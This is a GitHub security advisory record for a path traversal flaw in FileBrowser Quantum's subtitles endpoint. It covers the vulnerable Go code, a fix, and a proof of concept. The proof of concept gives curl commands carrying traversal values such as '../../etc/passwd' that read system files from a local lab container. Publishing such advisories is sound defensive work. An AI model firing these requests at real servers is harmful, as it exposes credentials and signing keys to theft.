{"id":"CVE-2026-54910","aliases":["GHSA-vvp7-h4fj-m28w"],"title":"FileBrowser Quantum's path traversal issue in subtitle handler allows any authenticated user to read arbitrary files","summary":"FileBrowser Quantum's path traversal issue in subtitle handler allows any authenticated user to read arbitrary files","severity":"high","cvss":7.7,"cwe":["CWE-22","CWE-23"],"vendor":"gtsteffaniak","product":"github.com/gtsteffaniak/filebrowser/backend","ecosystem":"go","affected":["github.com/gtsteffaniak/filebrowser/backend < 0.0.0-20260608182036-f3f4bbe80cb5"],"patched":["github.com/gtsteffaniak/filebrowser/backend 0.0.0-20260608182036-f3f4bbe80cb5"],"published":"2026-07-31","updated":"2026-07-31","source":"GHSA","sourceUrl":"https://github.com/advisories/GHSA-vvp7-h4fj-m28w","references":[{"url":"https://github.com/gtsteffaniak/filebrowser/security/advisories/GHSA-vvp7-h4fj-m28w"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-54910"},{"url":"https://github.com/gtsteffaniak/filebrowser/pull/2524"},{"url":"https://github.com/gtsteffaniak/filebrowser/commit/f3f4bbe80cb569d664174aea874d7bfa008c3b5a"},{"url":"https://github.com/gtsteffaniak/filebrowser/releases/tag/v1.4.3-beta"},{"url":"https://github.com/advisories/GHSA-vvp7-h4fj-m28w"}],"tags":["ghsa","go"],"epss":0.0046,"epssPercentile":0.39038,"ingestedAt":"2026-07-31T23:04:59.762Z","slug":"CVE-2026-54910","body":"## Overview\n\n### Summary\n\nThe `subtitlesHandler` endpoint (`GET /api/media/subtitles`) accepts two user-controlled query parameters: `path` and `name`, both of which are used in filesystem operations without sanitization, creating two independent path traversal vectors.\n\nThe primary vector is the `path` parameter: it is passed directly to `idx.GetRealPath()` without calling `SanitizeUserPath()`, allowing an attacker to escape the storage root and set `parentDir` to any directory on the host. No existing anchor file is required. \n\nThe secondary vector is the `name` parameter: it is joined with `parentDir` via `filepath.Join(parentDir, name)` without stripping directory components, allowing traversal relative to any resolved `parentDir`.\n\nAny authenticated user (regardless of role or permissions) can exploit either vector to read any text file readable by the server process, including `/etc/passwd`, SSH keys, database credentials, and JWT signing keys.\n\n### Details\n\n**1. `path` parameter lacks `SanitizeUserPath()` — primary vector (`http/media.go:54`)**\n\n```go\nuserscope, err := d.user.GetScopeForSourceName(source)\n// ...\nrealPath, _, err := idx.GetRealPath(userscope, path)  // path is raw user input, no sanitization\n// ...\nparentDir := filepath.Dir(realPath)  // line 59: attacker controls this directory\n```\n\n`SanitizeUserPath()` explicitly rejects `..` segments:\n\n```go\nfunc SanitizeUserPath(userPath string) (string, error) {\n    // ...\n    for _, segment := range segments {\n        if segment == \"..\" {\n            return \"\", fmt.Errorf(\"invalid path: path traversal detected\")\n        }\n    }\n    // ...\n}\n```\n\nEvery other handler in the codebase calls `SanitizeUserPath()` before `GetRealPath()`. This handler skips it, so `path=../../etc/passwd` resolves `parentDir` to `/etc`, with no anchor file required.\n\n**2. `name` parameter used directly in `filepath.Join` — secondary vector (`http/media.go:63`)**\n\n```go\nname := r.URL.Query().Get(\"name\")  // line 37 — raw user input\n// ...\ncontent, err = utils.GetSubtitleSidecarContent(\n    filepath.Join(parentDir, name))  // line 63 — TRAVERSAL\n```\n\n`filepath.Join(parentDir, \"../../etc/passwd\")` resolves the `..` components, escaping `parentDir`. This vector requires a valid file in scope as the `path` anchor.\n\n**3. `GetSubtitleSidecarContent` reads and returns file contents (`common/utils/media.go:17-43`)**\n\n```go\nfunc GetSubtitleSidecarContent(subtitlePath string) (string, error) {\n    info, err := os.Stat(subtitlePath)        // follows the traversed path\n    // size check: < 50MB\n    isText, err := IsTextFile(subtitlePath)   // checks UTF-8 validity\n    content, err := os.ReadFile(subtitlePath) // reads and returns content\n    return string(content), nil\n}\n```\n\nThe only constraint is that the target file must be UTF-8 valid and under 50MB. Binary files silently return an empty string.\n\n**4. Endpoint is behind `withUser` but requires no special permissions**\n\n```go\n// httpRouter.go\napi.HandleFunc(\"GET /media/subtitles\", withUser(subtitlesHandler))\n```\n\nAny authenticated user can access this endpoint: no admin, modify, share, or download permission is required.\n\n### PoC\n\n**Vector 1: `path` traversal (no anchor file needed):**\n\n```bash\ndocker run -d --name filebrowser-q-lab -p 18080:80 gtstef/filebrowser:latest && sleep 3\nTOKEN=$(curl -s -X POST \"http://localhost:18080/api/auth/login?username=admin\" -H \"X-Password: admin\" | tr -d '\"')\ncurl \"http://localhost:18080/api/media/subtitles?path=../../etc/passwd&source=srv&name=passwd&embedded=false&auth=$TOKEN\"\n```\n**Expected output:** `/etc/passwd` contents with HTTP 200.\n\n**Vector 2: `name` traversal (anchor file required):**\n\n```bash\nmkdir -p /tmp/fbq-srv && echo \"dummy\" > /tmp/fbq-srv/poc.txt\ndocker run -d --name filebrowser-q-lab2 -p 18081:80 -v /tmp/fbq-srv:/srv gtstef/filebrowser:latest && sleep 3\nTOKEN=$(curl -s -X POST \"http://localhost:18081/api/auth/login?username=admin\" -H \"X-Password: admin\" | tr -d '\"')\ncurl \"http://localhost:18081/api/media/subtitles?path=/poc.txt&source=srv&name=../../etc/passwd&embedded=false&auth=$TOKEN\"\n```\n**Expected output:** `/etc/passwd` contents with HTTP 200.\n\n### Impact\n\n- **Arbitrary file read**: Any authenticated user can read any text file on the host filesystem that the server process has read permission for.\n- **No anchor file required**: The `path` vector works on a default install with an empty storage root, so no existing file in scope is needed.\n- **Scope bypass**: Scoped users (restricted to a subdirectory) can escape their scope via either vector and access files belonging to other users or the host system.\n- **Credential exposure**: `/etc/passwd`, `/etc/shadow` (if running as root), SSH private keys, application configuration files with database passwords, API keys, and JWT signing secrets.\n- **Privilege escalation**: Reading the JWT signing key from the database or config file enables forging admin tokens.\n- **No special permissions required**: The endpoint only requires basic authentication: no admin, modify, share, or download permissions.\n\n### Recommended Fix\n\nApply `SanitizeUserPath()` to the `path` parameter and `filepath.Base()` to the `name` parameter:\n\n```go\n// http/media.go, subtitlesHandler\n\n// Sanitize path parameter (like all other handlers)\npath, err := utils.SanitizeUserPath(path)\nif err != nil {\n    return http.StatusBadRequest, err\n}\n\n// Strip directory components from name to prevent traversal\nname = filepath.Base(name)\n```\n\n`SanitizeUserPath()` rejects any `..` segment. `filepath.Base(\"../../etc/passwd\")` returns `\"passwd\"`, preventing traversal via `name`. Additionally, consider adding a file extension allowlist to restrict `name` to subtitle formats (`.srt`, `.vtt`, `.ass`, `.ssa`, `.sub`) only.\n\n## Affected packages\n\n- `github.com/gtsteffaniak/filebrowser/backend < 0.0.0-20260608182036-f3f4bbe80cb5`\n\n## Remediation\n\nUpgrade to a patched release:\n\n- `github.com/gtsteffaniak/filebrowser/backend 0.0.0-20260608182036-f3f4bbe80cb5`","depth":"twilight","depthScore":42,"depthScoreParts":{"impact":42.4,"likelihood":0.1,"exploitation":0,"ransomware":0},"changes":[]}